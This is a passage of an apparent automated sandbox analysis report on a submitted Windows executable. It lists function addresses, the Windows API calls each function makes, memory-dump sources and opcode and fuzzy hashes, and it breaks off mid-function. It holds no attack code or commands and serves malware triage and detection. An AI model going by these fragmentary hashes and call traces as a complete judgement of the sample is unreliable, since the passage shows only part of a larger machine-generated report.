                                                                                                                        • Opcode ID: f6a2cf74d7a01e6596447bdf6e8af8dfe1c6b489c74989028028e8569a8ae2f5
                                                                                                                        • Instruction ID: c6136f9fc9b8287e4255750945e0d6448a2bf261b42c9600f0abccdcd726c832
                                                                                                                        • Opcode Fuzzy Hash: f6a2cf74d7a01e6596447bdf6e8af8dfe1c6b489c74989028028e8569a8ae2f5
                                                                                                                        • Instruction Fuzzy Hash: 08011975200605BFDB114FA9EC49A6A3F6EFF8A3A0B604419FA45D7360DA31DD04EA60
                                                                                                                        Function 00570FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00570FCA
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00570FD6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00570FE5
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00570FEC
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00571002
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: c45069ca284d4fd7f6399ac621f8fbb70e8bc9340150943286064622f09ba86d
                                                                                                                        • Instruction ID: fb6028b963192fc27c0e25af8a7c0bd5262cba8585d98445d484def58dba836d
                                                                                                                        • Opcode Fuzzy Hash: c45069ca284d4fd7f6399ac621f8fbb70e8bc9340150943286064622f09ba86d
                                                                                                                        • Instruction Fuzzy Hash: 7CF04935200701ABDB214FA9AC4DF5A3FADFF9A762F104415FA49C6251EE70DC54AA60
                                                                                                                        Function 00571014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0057102A
                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00571036
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571045
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0057104C
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571062
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: d5f4b3ebc07cdc12eb6636ac184be9f7786526de063174e18f9b7b78d1e892d5
                                                                                                                        • Instruction ID: 2fa8470c3eb9a693007dc5b96c8b49590f76c8b5d46856077688edcdbde6c1f6
                                                                                                                        • Opcode Fuzzy Hash: d5f4b3ebc07cdc12eb6636ac184be9f7786526de063174e18f9b7b78d1e892d5
                                                                                                                        • Instruction Fuzzy Hash: 9DF04935200701ABDB215FAAEC4DF5A3FADFF9A761F104415FA49C6250DE70D854AA60
                                                                                                                        Function 0058030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580324
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580331
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 0058033E
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 0058034B
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580358
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580365
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: 7834c3ed929462e4082d5966cb35c3af576849a463b1935eef56009c7957ac67
                                                                                                                        • Instruction ID: 63279650871853044fdf335bb996c966c14b476cf46726462eed549cd631cf13
                                                                                                                        • Opcode Fuzzy Hash: 7834c3ed929462e4082d5966cb35c3af576849a463b1935eef56009c7957ac67
                                                                                                                        • Instruction Fuzzy Hash: 10019C72801B159FCB30AF66D880816FBF9BE602163159E3FD19662971CBB1A958DF80
                                                                                                                        Function 0054D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0054D752
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 0054D764
                                                                                                                        • _free.LIBCMT ref: 0054D776
                                                                                                                        • _free.LIBCMT ref: 0054D788
                                                                                                                        • _free.LIBCMT ref: 0054D79A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 0e09515219e6085af8511fe0c43ee2f152e8a18f32f9bde6045214b719798093
                                                                                                                        • Instruction ID: 13e23af86243c5d14f9ed30e9a6b8df4a749c514032d72bdaff7f8b76eb33a5f
                                                                                                                        • Opcode Fuzzy Hash: 0e09515219e6085af8511fe0c43ee2f152e8a18f32f9bde6045214b719798093
                                                                                                                        • Instruction Fuzzy Hash: 46F04F32541216AB8621EB65F9C5D967FFDFB44318BD40806F049D7502C734FC809670
                                                                                                                        Function 00575C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00575C58
                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00575C6F
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00575C87
                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00575CA3
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00575CBD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3741023627-0
                                                                                                                        • Opcode ID: ac88b2363bdaaa7499b7834fec45fe70df19d3109fe8213ee3b6bd6814aee176
                                                                                                                        • Instruction ID: fb1d42a86d788f89ca4a9de9a2f5bc9cf14a09e9d727cd8c61a7b81790096234
                                                                                                                        • Opcode Fuzzy Hash: ac88b2363bdaaa7499b7834fec45fe70df19d3109fe8213ee3b6bd6814aee176
                                                                                                                        • Instruction Fuzzy Hash: 88018630500B04ABEB215B14ED4EFA67FFCBB11B05F044559A587A20E1EBF0AD88AA90
                                                                                                                        Function 005422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 005422BE
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 005422D0
                                                                                                                        • _free.LIBCMT ref: 005422E3
                                                                                                                        • _free.LIBCMT ref: 005422F4
                                                                                                                        • _free.LIBCMT ref: 00542305
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 6a2b031925cebc4a2d359f9b5ac1a6920efaee68420e7bb23758ae22cf4c424d
                                                                                                                        • Instruction ID: 6e6b9053c052ea30b8df7a7fa076dd89f6a959f781c5bc0cc975154efe4965d6
                                                                                                                        • Opcode Fuzzy Hash: 6a2b031925cebc4a2d359f9b5ac1a6920efaee68420e7bb23758ae22cf4c424d
                                                                                                                        • Instruction Fuzzy Hash: 66F0B4784015B29B8A26AF56BC8188C3F74F738764F801107F058DA2B1C7710496FFE8
                                                                                                                        Function 005295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EndPath.GDI32(?), ref: 005295D4
                                                                                                                        • StrokeAndFillPath.GDI32(?,?,005671F7,00000000,?,?,?), ref: 005295F0
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00529603
                                                                                                                        • DeleteObject.GDI32 ref: 00529616
                                                                                                                        • StrokePath.GDI32(?), ref: 00529631
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2625713937-0
                                                                                                                        • Opcode ID: 1de2066f372abafc33b299c12c1ac75a756c330819fcff9d7bc5cd86e80e004b
                                                                                                                        • Instruction ID: 200df3aa9b78b2f16348f5e6e0a2d62ff1a6f020dfa8d45f27de7e33c17c2d95
                                                                                                                        • Opcode Fuzzy Hash: 1de2066f372abafc33b299c12c1ac75a756c330819fcff9d7bc5cd86e80e004b
                                                                                                                        • Instruction Fuzzy Hash: 11F04F31105A48EBDB1A5F65ED5C7683FA1BF22322F048214F4A5991F2CB348999FF28
                                                                                                                        Function 00540F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea$_free
                                                                                                                        • String ID: a/p$am/pm
                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                        • Opcode ID: 80df0facff56a307b35277d354b267233c5c8cfe930299b035d27d01bf7ca494
                                                                                                                        • Instruction ID: b3fb87df8b0c21aec00abaf69fc268ed9dd220c54b0c1d378f7e8fd52fd1d0f7
                                                                                                                        • Opcode Fuzzy Hash: 80df0facff56a307b35277d354b267233c5c8cfe930299b035d27d01bf7ca494
                                                                                                                        • Instruction Fuzzy Hash: 40D14835900A06DBCB288F68C859BFEBFB1FF05708F244919E9169B650D3759DC0CB99
                                                                                                                        Function 005961D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00530242: EnterCriticalSection.KERNEL32(005E070C,005E1884,?,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053024D
                                                                                                                          • Part of subcall function 00530242: LeaveCriticalSection.KERNEL32(005E070C,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053028A
                                                                                                                          • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00596238
                                                                                                                          • Part of subcall function 005301F8: EnterCriticalSection.KERNEL32(005E070C,?,?,00528747,005E2514), ref: 00530202
                                                                                                                          • Part of subcall function 005301F8: LeaveCriticalSection.KERNEL32(005E070C,?,00528747,005E2514), ref: 00530235
                                                                                                                          • Part of subcall function 0058359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005835E4
                                                                                                                          • Part of subcall function 0058359C: LoadStringW.USER32(005E2390,?,00000FFF,?), ref: 0058360A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                        • String ID: x#^$x#^$x#^
                                                                                                                        • API String ID: 1072379062-3539263148
                                                                                                                        • Opcode ID: 75ede35975a95d81150152e86399bd8fda22f909111fe4b141f4bdf052faf4a5
                                                                                                                        • Instruction ID: b7042cb355b1f99f464c70204d58ead184cd3a5e64363a337f8234473ba18ccd
                                                                                                                        • Opcode Fuzzy Hash: 75ede35975a95d81150152e86399bd8fda22f909111fe4b141f4bdf052faf4a5
                                                                                                                        • Instruction Fuzzy Hash: 11C17B71A00106AFDF14DF98C895EAEBBB9FF48300F118469F945AB291DB70ED49CB90
                                                                                                                        Function 00548A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00548B6E
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00548B7A
                                                                                                                        • __dosmaperr.LIBCMT ref: 00548B81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                                                        • String ID: .S
                                                                                                                        • API String ID: 2434981716-1539595904
                                                                                                                        • Opcode ID: b00082088acc37bbf87162f7e33cde85b6b5a706494779aad554395f90418ada
                                                                                                                        • Instruction ID: 61160430dc0af42a2c6ce47f131ebf2d9356acf99187ec2df56aaa95f0567b98
                                                                                                                        • Opcode Fuzzy Hash: b00082088acc37bbf87162f7e33cde85b6b5a706494779aad554395f90418ada
                                                                                                                        • Instruction Fuzzy Hash: 40419D70604045AFCB249F25CC84AFD7FE5FB8631CF2885AAF8958B242DE71CC429790
                                                                                                                        Function 0054172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ty1nyFUMlo.exe,00000104), ref: 00541769
                                                                                                                        • _free.LIBCMT ref: 00541834
                                                                                                                        • _free.LIBCMT ref: 0054183E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                        • String ID: C:\Users\user\Desktop\ty1nyFUMlo.exe
                                                                                                                        • API String ID: 2506810119-3999978784
                                                                                                                        • Opcode ID: 85266c84dfedaa20b5a7290546344e0bfc9e02bd7658e47d04f4e2feb068dd38
                                                                                                                        • Instruction ID: eeee8538d5b81146783530cfec5b4309f3ba51fceb5c8e64b119fbbb5fd5db2b
                                                                                                                        • Opcode Fuzzy Hash: 85266c84dfedaa20b5a7290546344e0bfc9e02bd7658e47d04f4e2feb068dd38
                                                                                                                        • Instruction Fuzzy Hash: 5331BC75A00A58ABDB25DB9A9C84DDEBFFCFB95314F104166F8049B211D6708A80DB98
                                                                                                                        Function 0057C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0057C306
                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0057C34C
                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005E1990,015155B8), ref: 0057C395
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 135850232-4108050209
                                                                                                                        • Opcode ID: 03565f18d6f4bf437eb29874ece6787541dfd90247eec257be14d44aeb22ef59
                                                                                                                        • Instruction ID: 82bc2f369544b9245633c3bd4eff52f0b4197526ff05008ff2d93bf76aac84ee
                                                                                                                        • Opcode Fuzzy Hash: 03565f18d6f4bf437eb29874ece6787541dfd90247eec257be14d44aeb22ef59
                                                                                                                        • Instruction Fuzzy Hash: A1418E712043029FD720DF25E884B5ABFE4BF85320F14CA1DF9A9972D1D730A904EB62
                                                                                                                        Function 005A4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,005ACC08,00000000,?,?,?,?), ref: 005A44AA
                                                                                                                        • GetWindowLongW.USER32 ref: 005A44C7
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A44D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID: SysTreeView32
                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                        • Opcode ID: 7d29528cef674264b84be62b0e111c28e55fdb622321f230796781f3db644e79
                                                                                                                        • Instruction ID: 4873749e4507687ffc0272da20159f5b84f6073fe35ad84ddef6095fe723cada
                                                                                                                        • Opcode Fuzzy Hash: 7d29528cef674264b84be62b0e111c28e55fdb622321f230796781f3db644e79
                                                                                                                        • Instruction Fuzzy Hash: B9315C31210606AFDF219EB8DC45BEA7FA9FB8A334F204725F975921D0D7B0AC519B50
                                                                                                                        Function 00576E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysReAllocString.OLEAUT32(?,?), ref: 00576EED
                                                                                                                        • VariantCopyInd.OLEAUT32(?,?), ref: 00576F08
